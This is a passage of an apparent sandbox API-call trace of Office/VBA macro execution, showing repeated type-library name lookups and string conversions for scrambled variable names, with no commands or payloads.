pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a615b2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZkBQAA") returned 7 [0068.902] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZkBQAA", lHashVal=0x105bef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a615b2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZkBQAA") returned 7 [0068.902] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZkBQAA", lHashVal=0x105bef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZkBQAA") returned 0x105bef [0068.902] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ZkBQAA" | out: _Dst="ZkBQAA") returned 0x0 [0068.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ZkBQAA") returned 7 [0068.902] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.902] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZkBQAA", lHashVal=0x105bef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.902] IUnknown:Release (This=0x665ba50) returned 0xd [0068.902] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.902] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZkBQAA", lHashVal=0x105bef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.902] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.902] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.902] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZkBQAA", lHashVal=0x105bef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.902] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.902] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.902] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZkBQAA", lHashVal=0x105bef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.902] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a615b2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZkBQAA") returned 7 [0068.902] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZkBQAA", lHashVal=0x105bef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.902] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.902] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a615b2 | out: _Dst=0x67c2d40) returned 0x0 [0068.902] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZkBQAA") returned 0x10d698 [0068.902] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ZkBQAA" | out: _Dst="_B_var_ZkBQAA") returned 0x0 [0068.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ZkBQAA") returned 14 [0068.902] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.902] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZkBQAA", lHashVal=0x10d698, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.902] IUnknown:Release (This=0x665ba50) returned 0xd [0068.903] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.903] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZkBQAA", lHashVal=0x10d698, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.903] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.903] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.903] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZkBQAA", lHashVal=0x10d698, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.903] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.903] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.903] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZkBQAA", lHashVal=0x10d698, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.903] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.903] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.903] IUnknown:Release (This=0x665ba50) returned 0xd [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1004e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ZkBQAA") returned 14 [0068.903] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZkBQAA", lHashVal=0x10d698, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0068.903] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a615b2 | out: _Dst=0x144ec0) returned 0x0 [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61602, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pQAxZZC") returned 8 [0068.903] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pQAxZZC", lHashVal=0x10dfa9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61602, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pQAxZZC") returned 8 [0068.903] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pQAxZZC", lHashVal=0x10dfa9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61602, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pQAxZZC") returned 8 [0068.903] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pQAxZZC", lHashVal=0x10dfa9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.903] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pQAxZZC") returned 0x10dfa9 [0068.903] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="pQAxZZC" | out: _Dst="pQAxZZC") returned 0x0 [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="pQAxZZC") returned 8 [0068.903] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.903] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pQAxZZC", lHashVal=0x10dfa9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.903] IUnknown:Release (This=0x665ba50) returned 0xd [0068.903] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.903] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pQAxZZC", lHashVal=0x10dfa9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.903] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.903] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.903] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pQAxZZC", lHashVal=0x10dfa9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.903] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.904] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.904] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pQAxZZC", lHashVal=0x10dfa9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.904] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61602, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pQAxZZC") returned 8 [0068.904] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pQAxZZC", lHashVal=0x10dfa9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.904] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.904] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61602 | out: _Dst=0x67c2d40) returned 0x0 [0068.904] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pQAxZZC") returned 0x10e32d [0068.904] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_pQAxZZC" | out: _Dst="_B_var_pQAxZZC") returned 0x0 [0068.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_pQAxZZC") returned 15 [0068.904] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.904] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pQAxZZC", lHashVal=0x10e32d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.904] IUnknown:Release (This=0x665ba50) returned 0xd [0068.904] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.904] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pQAxZZC", lHashVal=0x10e32d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.904] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.904] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.904] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pQAxZZC", lHashVal=0x10e32d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.904] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.904] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.904] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pQAxZZC", lHashVal=0x10e32d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.904] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.904] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.904] IUnknown:Release (This=0x665ba50) returned 0xd [0068.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1007e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_pQAxZZC") returned 15 [0068.904] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pQAxZZC", lHashVal=0x10e32d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x5a007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x5a007800000000, pDummy=0x0) returned 0x0 [0068.904] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61602 | out: _Dst=0x144ec0) returned 0x0 [0068.904] ITypeComp:RemoteBind (in: This=0x665ba60, szName="LAXDDXw", lHashVal=0x10b9cd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a615da, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="LAXDDXw") returned 8 [0068.905] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="LAXDDXw", lHashVal=0x10b9cd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a615da, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="LAXDDXw") returned 8 [0068.905] ITypeComp:RemoteBind (in: This=0x665bd30, szName="LAXDDXw", lHashVal=0x10b9cd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LAXDDXw") returned 0x10b9cd [0068.905] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="LAXDDXw" | out: _Dst="LAXDDXw") returned 0x0 [0068.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="LAXDDXw") returned 8 [0068.905] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.905] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="LAXDDXw", lHashVal=0x10b9cd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.905] IUnknown:Release (This=0x665ba50) returned 0xd [0068.905] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.905] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="LAXDDXw", lHashVal=0x10b9cd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.905] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.905] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.905] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="LAXDDXw", lHashVal=0x10b9cd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.905] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.905] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.905] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="LAXDDXw", lHashVal=0x10b9cd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.905] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a615da, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="LAXDDXw") returned 8 [0068.905] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="LAXDDXw", lHashVal=0x10b9cd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.905] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.905] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a615da | out: _Dst=0x67c2d40) returned 0x0 [0068.905] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_LAXDDXw") returned 0x10bd51 [0068.905] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_LAXDDXw" | out: _Dst="_B_var_LAXDDXw") returned 0x0 [0068.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_LAXDDXw") returned 15 [0068.906] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.906] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_LAXDDXw", lHashVal=0x10bd51, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.906] IUnknown:Release (This=0x665ba50) returned 0xd [0068.906] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.906] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_LAXDDXw", lHashVal=0x10bd51, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.906] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.906] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.906] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_LAXDDXw", lHashVal=0x10bd51, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.906] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.906] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.906] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_LAXDDXw", lHashVal=0x10bd51, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.906] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.906] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.906] IUnknown:Release (This=0x665ba50) returned 0xd [0068.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b100ae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_LAXDDXw") returned 15 [0068.906] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_LAXDDXw", lHashVal=0x10bd51, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x44004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x44004400000000, pDummy=0x0) returned 0x0 [0068.906] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a615da | out: _Dst=0x144ec0) returned 0x0 [0068.906] ITypeComp:RemoteBind (in: This=0x665ba60, szName="VDX1Xw", lHashVal=0x10590e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61652, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VDX1Xw") returned 7 [0068.906] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="VDX1Xw", lHashVal=0x10590e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61652, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VDX1Xw") returned 7 [0068.906] ITypeComp:RemoteBind (in: This=0x665bd30, szName="VDX1Xw", lHashVal=0x10590e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.906] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VDX1Xw") returned 0x10590e [0068.906] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="VDX1Xw" | out: _Dst="VDX1Xw") returned 0x0 [0068.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="VDX1Xw") returned 7 [0068.907] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.907] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="VDX1Xw", lHashVal=0x10590e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.907] IUnknown:Release (This=0x665ba50) returned 0xd [0068.907] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.907] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="VDX1Xw", lHashVal=0x10590e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.907] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.907] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.907] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="VDX1Xw", lHashVal=0x10590e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.907] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.907] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.907] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="VDX1Xw", lHashVal=0x10590e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.907] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61652, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VDX1Xw") returned 7 [0068.907] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="VDX1Xw", lHashVal=0x10590e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.907] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.907] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61652 | out: _Dst=0x67c2d40) returned 0x0 [0068.907] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_VDX1Xw") returned 0x10d3b7 [0068.907] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_VDX1Xw" | out: _Dst="_B_var_VDX1Xw") returned 0x0 [0068.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_VDX1Xw") returned 14 [0068.907] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.907] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_VDX1Xw", lHashVal=0x10d3b7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.907] IUnknown:Release (This=0x665ba50) returned 0xd [0068.907] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.907] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_VDX1Xw", lHashVal=0x10d3b7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 